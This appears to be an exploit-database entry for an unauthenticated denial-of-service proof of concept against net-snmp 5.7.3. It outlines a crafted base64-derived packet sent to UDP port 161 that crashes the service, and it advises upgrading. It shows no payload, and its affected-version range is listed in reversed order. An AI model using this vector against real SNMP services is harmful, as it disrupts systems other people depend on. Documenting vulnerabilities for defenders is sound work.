Vendor: Net-SNMP
By: Magnus Klaaborg Stubman
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 400
Product Name: Net-SNMP
Affected Version From: 5.7.3
Affected Version To: 5.6.2.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:net-snmp:net-snmp
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux, Windows
2018
net-snmp 5.7.3 – Unauthenticated Denial of Service (PoC)
This exploit is a proof of concept for a denial-of-service vulnerability in net-snmp 5.7.3. The vulnerability is triggered by sending a specially crafted packet to the SNMP port (UDP/161). The packet contains a base64-encoded string, which is decoded and sent to the SNMP port, causing the service to crash.
Mitigation:
Upgrade to the latest version of net-snmp.